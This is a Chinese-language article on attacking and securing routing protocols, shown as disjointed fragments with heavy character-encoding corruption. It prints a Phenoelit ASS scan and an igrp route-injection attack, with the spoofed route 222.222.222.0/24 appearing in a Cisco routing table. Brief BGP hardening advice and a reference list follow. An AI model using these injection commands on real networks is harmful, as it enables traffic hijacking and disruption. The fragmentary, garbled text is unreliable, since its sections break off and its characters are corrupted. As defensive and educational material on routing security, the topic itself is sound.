此文章討論了有關對網(wǎng)絡底層協(xié)議的攻擊和防止攻擊的方法,非凡是關于路由和路由 協(xié)議的漏洞,如Routing Information PRotocol (Rip,路由信息協(xié)議), Border Gateway Protocol (邊緣網(wǎng)關協(xié)議), Open Shortest Path First (OSPF,開放最短路徑優(yōu)先協(xié)議)等。
test# ./ass -mA -i eth0 -D 192.168.1.10 -b15 -v (這里的-i是接口,-D是目的地址,-b15指的是自主系統(tǒng)0-15之間 ASS [Autonomous System Scanner] $Revision: 2.14 $ (c) 2k FX Phenoelit (http://www.phenoelit.de) No protocols selected; scanning all Running scan with: interface eth0 Autonomous systems 0 to 15 delay is 1 in ACTIVE mode
Building target list ... 192.168.1.10 is alive Scanning ... Scanning IGRP on 192.168.1.10 Scanning IRDP on 192.168.1.10 Scanning RIPv1 on 192.168.1.10 shutdown ...
test# ./igrp -i eth0 -f routes.txt -a 10 -S 192.168.1.254 -D 192.168.1.10 當然這里的routes.txt需要你自己指定: routes.txt: # format # destination:delay:bandwith:mtu:reliability:load:hopcount 222.222.222.0:500:1:1500:255:1:0
Cisco#sh ip route Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default U - per-user static route
Gateway of last resort is not set
10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks C 10.1.2.0/30 is directly connected, Tunnel0 S 10.0.0.0/8 is directly connected, Tunnel0 C 192.168.9.0/24 is directly connected, Ethernet0 C 192.168.1.0/24 is directly connected, Ethernet0 I 222.222.222.0/24 [100/1600] via 192.168.1.254, 00:00:05, Ethernet0 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 看到?jīng)]有,到達222.222.222.0/24經(jīng)由192.168.1.254
要使BGP更安全,你最好對端口179采用訪問列表控制,使用MD5認證,使用安全傳輸媒體進行 安全BGP通信和執(zhí)行路由過濾(你可以查看下面的文檔(see http://www.cisco.com/univercd/cc/ td/doc/prodUCt/software/ios120/12cgcr/np1_c/1cprt1/1cbgp.htm#40309)以及一些標準的路 由安全設置過濾配置。 Open Shortest Path First (OSPF,開放最短路徑優(yōu)先協(xié)議)
上面的一些信息你可以參考http://www.ietf.org/rfc/rfc2328.txt和JiNao對OSPF的漏洞 分析:On the Vulnerabilities and Protection of OSPF Routing Protocol (http://ww w.anr.mcnc.org/projects/JiNao/ic3n98.ps).
Cisco Systems. “Improving Security on Cisco Routers”. URL: http://www.cisco.com/warp/public/707/21.html
Convery, Sean (CCIE #4232) and Trudel, Bernie (CCIE #1884). “SAFE: A Security Blueprint for Enterprise Networks”. URL: http://www.cisco.com/warp/public/cc/so/cuso/epso/sqfr/safe_wp.htm
Frank Jou, Y. “Scalable Intrusion Detection for the Emerging Network Infrastru- cture”. URL: http://www.anr.mcnc.org/projects/JiNao/JiNao.html
Prue, Walt. “Re: Some abuse detection hacks”. NANOG list. (Mon, 9 Mar 1998) URL: http://www.cctec.com/maillists/nanog/historical/9803/msg00035.html
“Divert Sockets for Linux”. URL: http://www.anr.mcnc.org/~divert/
Obecian. “The nemesis packet injection tool-suite”. URL: http://www.packetninja.net/nemesis
Humble. “Spoofing RIP (Routing Information Protocol)”. URL: http://www.technotronic.com/horizon/ripar.txt
Cisco Press. “Routing Information Protocol”. (8 Dec 1999). URL: http://www.cisco.com/cpress/cc/td/cpress/fund/ith2nd/it2444.htm
Rekhter, Y. “A Border Gateway Protocol 4 (BGP-4)”. Request for Comments 1771. (Mar 1995). URL: http://www.isi.edu/in-notes/rcf1771.txt
Moy, J. “OSPF Version 2”. Request for Comments 1583. (March 1994). URL: http://www.isi.edu/in-notes/rfc1583.txt
Cisco Press. “Designing & Implementing an OSPF Network”. (2 Aug 2000). URL: http://www.cisco.com/cpress/cc/td/cpress/design/ospf/on0407.htm - xtocid1636554
Cisco Press. “RIP and OSPF redistribution”. (12 May 2000). URL: http://www.cisco.com/univercd/cc/td/doc/cisintwk/ics/cs001.htm
Grefer, Roland. Re: “Anyone know what IP protocol #54 is?”. SANS Institute Global Incident Analysis Center, Detects Analyzed 11/10/00. (10 Nov 2000). URL: http://www.sans.org/y2k/111000.htm
Ahmad, Dave & Rauch, Jeremey. “Routers, Switches & more: The glue that binds them all together” Black Hat Briefings 200, Las Vegas USA. (26 July 2000). URL: http://www.blackhat.com/html/bh-multi-media-archives.html
Batz. “Security Issues Affecting Internet Transit Points and Backbone Providers”. Black Hat Briefings 1999, Las Vegas. (7-8 July 1999). URL: http://www.blackhat.com/html/bh-multi-media-archives.html
Oquendo, J. “Theories in DoS”. URL: http://www.antioffline.com/TID/
Silicosis. “L0pht security advisory”. (11 August 1999). URL: http://www.l0pht.com/advisories/rdp.txt
OSPF Version 2 RFC http://www.ietf.org/rfc/rfc2328.txt